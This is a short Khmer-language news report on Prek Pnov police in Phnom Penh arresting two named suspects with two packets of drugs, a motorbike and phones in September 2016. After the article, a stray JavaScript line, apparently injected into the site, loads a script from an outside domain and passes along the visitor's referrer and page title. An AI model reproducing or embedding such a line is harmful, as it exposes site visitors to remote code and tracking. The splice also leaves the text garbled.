នគរបាលព្រែកព្នៅឃាត់ខ្លួនជនសង្ស័យ២នាក់ ដកហូតថ្នាំញៀន២កញ្ចប់ និងម៉ូតូមួយគ្រឿង

ភ្នំពេញ ៖ ជនសង្ស័យចំនួន២នាក់ និងថ្នាំញៀន០២កញ្ចប់ ត្រូវបានកម្លាំងល្បាតនគរបាលខណ្ឌព្រែកព្នៅចាប់វាយខ្នោះ ខណ:ចុះល្បាតប្រទះឃើញ ហើយបញ្ជូនមកសាកសួរនៅប៉ុស្តិ៏រដ្ឋបាល ដោយសារតែពួកគេបានរក្សាទុកនៅគ្រឿងញៀនជាប់នឹងខ្លួន។ហេតុការណ៏ឃាត់ខ្លួននេះបានធ្វើឡើង កាលពីវេលាម៉ោង៤និង៣០នាទីព្រឹក ថ្ងៃទី២៣ ខែកញ្ញា ឆ្នាំ២០១៦នេះ នៅត្រង់ចំណុចនៅចំណុចផ្លូវជាតិលេខ៥ ភូមិដួង សង្កាត់ព្រែកព្នៅ ខណ្ឌព្រែកព្នៅ។

អធិការខណ្ឌព្រែកព្នៅ លោក ឈិន គឹមធុយ បានអោយដឹងថាជនសង្ស័យដែលកម្លាំងសមត្ថកិច្ចឃាត់នោះទី១ឈ្នោះប្រាក់ បញ្ញា ភេទប្រុស អាយុ២៤ឆ្នាំ និងម្នាក់ទៀតឈ្មោះស្រេង សំណាង ភេទប្រុស អាយុ២៣ឆ្នាំ។ ក្នុងការឃាត់ខ្លួនសមត្ថកិច្ចរបស់លោកបានដកហូតនៅម្សៅក្រាមពណ៌(ស)ថ្លា ថ្នាំញៀនចំនួន០២កញ្ចប់តូច និងម៉ូតូមួយគ្រឿង រួមទាំងទូរស័ព្ទដៃ២គ្រឿងផងដែរ។

លោកបានបន្តអោយដឹងថា ខណ:នៅវេលាម៉ោងខាងលើកម្លាំងសហប៉ុស្តិ៍នគរបាលព្រែកព្នៅ បានចេញល្បាតដើម្បីទប់ស្កាត់បទល្មើសក្នុងមូលដ្ឋាន ក៏ប្រទះឃើញមុខសញ្ញាសង្ស័យ ហើយត្រួតពិនិត្យបានរកឃើញម្សៅពណ៌សរថ្លាជាសារធាតុញៀនចំនួន២កញ្ចប់នៅនឹងខ្លួន រួចសមត្ថកិច្ចយើងបានឃាត់ខ្លួនដើម្បីធ្វើការសាកសួរតែម្តង។

បច្ចុប្បន្នជនសង្ស័យខាងលើ ត្រូវកម្លាំងសមត្ថកិច្ចឃុំខ្លួនជាបណ្តោះអាសន្ននៅអធិការដ្ឋាន ដើម្បីកសាងសំណុំរឿង បញ្ជូនទៅកាន់តុលាការចាត់ការតាមនិតីវិធីច្បាប់ ៕

12 untitled

 s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More